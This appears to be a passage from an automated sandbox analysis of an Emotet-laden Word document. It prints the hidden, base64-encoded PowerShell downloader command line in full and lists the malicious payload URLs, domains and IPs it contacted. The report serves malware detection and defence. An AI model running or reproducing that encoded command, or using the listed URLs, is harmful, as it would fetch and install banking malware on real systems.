rACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004C5A cpuid 7_2_10004C5A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter, 7_2_10007D46
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336494 Sample: DATA-480841.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->59 61 12 other signatures 2->61 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 25 2->17         started        process3 signatures4 75 Suspicious powershell command line found 14->75 77 Very long command line found 14->77 79 Encrypted powershell cmdline option found 14->79 81 PowerShell case anomaly found 14->81 19 powershell.exe 12 9 14->19         started        22 msg.exe 14->22         started        process5 dnsIp6 47 khanhhoahomnay.net 210.86.239.69, 49168, 80 NETNAM-AS-APNetnamCompanyVN Viet Nam 19->47 49 veterinariadrpopui.com 209.59.139.39, 49167, 80 LIQUIDWEBUS United States 19->49 51 3 other IPs or domains 19->51 24 rundll32.exe 19->24         started        process7 process8 26 rundll32.exe 15 24->26         started        signatures9 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->69 29 rundll32.exe 5 26->29         started        process10 signatures11 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->73 32 rundll32.exe 5 29->32         started        process12 signatures13 53 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->53 35 rundll32.exe 5 32->35         started        process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->63 38 rundll32.exe 5 35->38         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->65 41 rundll32.exe 5 38->41         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->67 44 rundll32.exe 5 41->44         started        process20 signatures21 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->71
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.27.145.251
unknown United States
13335 CLOUDFLARENETUS true
210.86.239.69
unknown Viet Nam
24173 NETNAM-AS-APNetnamCompanyVN true
209.59.139.39
unknown United States
32244 LIQUIDWEBUS true
104.18.61.59
unknown United States
13335 CLOUDFLARENETUS true
5.2.136.90
unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO true

Contacted Domains

Name IP Active
veterinariadrpopui.com 209.59.139.39 true
wpsapk.com 104.18.61.59 true
sofsuite.com 104.27.145.251 true
khanhhoahomnay.net 210.86.239.69 true
shop.elemenslide.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://veterinariadrpopui.com/content/5f18Q/ true
  • Avira URL Cloud: malware
unknown
http://sofsuite.com/wp-includes/2jm3nIk/ true
  • Avira URL Cloud: safe
unknown
http://khanhhoahomnay.net/wordpress/CGMC/ true
  • Avira URL Cloud: malware
unknown
http://wpsapk.com/wp-admin/v/ true
  • Avira URL Cloud: safe
unknown
http://5.2.136.90/6tycsc/ true
  • Avira URL Cloud: safe
unknown